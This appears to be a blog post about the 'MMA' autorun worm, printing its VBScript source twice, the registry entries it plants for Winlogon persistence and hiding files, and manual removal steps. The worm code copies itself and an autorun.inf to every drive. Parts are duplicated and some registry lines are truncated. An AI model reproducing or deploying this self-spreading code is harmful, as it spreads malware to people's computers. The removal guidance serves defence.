The most famous virus doing round these days is this one.. MMA.
It has mainly 4 files along with it.
1.mma.vbs(The source code of this virus)
2.mma.bat(The bat file which executes)
3.a war file named mma.
4. the autorun file(The obvious one)
Following is the source code of mma virus
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net
on error resume next
Set WshShell =CreateObject("WScript.Shell")
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\mma.vbs" then
isdir=true
else
a=WshShell.Run("mma.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("mma.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\mma.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
else
Of.CopyFile "mma.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
end if
a=WshShell.Run("mma.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("mma.bat - "&dir ,0,True)
Of.CopyFile "mma.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
a=WshShell.Run("mma.bat + "&dir ,0,True)
end if
next
It has mainly 4 files along with it.
1.mma.vbs(The source code of this virus)
2.mma.bat(The bat file which executes)
3.a war file named mma.
4. the autorun file(The obvious one)
Following is the source code of mma virus
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net
on error resume next
Set WshShell =CreateObject("WScript.Shell")
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\mma.vbs" then
isdir=true
else
a=WshShell.Run("mma.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("mma.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\mma.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
else
Of.CopyFile "mma.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
end if
a=WshShell.Run("mma.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("mma.bat - "&dir ,0,True)
Of.CopyFile "mma.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
a=WshShell.Run("mma.bat + "&dir ,0,True)
end if
next
How it works?
When you double click on any drive and it doesnot open, and when you right click it it doesnot show an open or explore option, and shows something else. Then the first thing you got to do is to type the drive name in the address bar+:
once the drive is open, go to tools-> folder options-> view hidden files and folders-> uncheck hide operating system files. and click okey.
now you can see all the hidden files also. If by chance you find files named mma your pc is infected with it
once the drive is open, go to tools-> folder options-> view hidden files and folders-> uncheck hide operating system files. and click okey.
now you can see all the hidden files also. If by chance you find files named mma your pc is infected with it
Steps to remove MMA virus:
What you have to do is simple:
Step1:
Stop the process named WScript.exe from your taskmanager.
Step2:
Remove all the mma virus files. By the way i forgot it also has a registry file.
Before deleting that mma.reg file, just right click it->Edit. Now save it as a .txt file.
Now delete all the mma files from all drives. To open the drive in your address bar just type the drive name +: and press Enter.
Step 3:
From the text file that you saved, Open the registry and go to that key. There will be one entry in userinit from that be sure that you just remove the Wscript entry else if you delete the key as a whole then your pc might not start. To remove just that entry,
right click on the key->modify. Now just remove the WSCript entry.
The second key which will be present in the mma.reg file, You can delete it fully.
Step4:
Just restart your explorer. And now your pc is free from MMA.
code of regitry file
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"
[HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W
"Userinit"="userinit.exe,mma.bat"
[HKEY_CURRENT_USER\Software\Microsoft\Wi
"ShowSuperHidden"=dword:00000000
Removing from registry:
Just edit the first key and remove just the reference of mma.bat. BE CAREFUL THAT YOU DONT DELETE THIS KEY ELSE YOU WONT BE ABLE TO RUN XP.
You can delete the second key safely.
No comments:
Post a Comment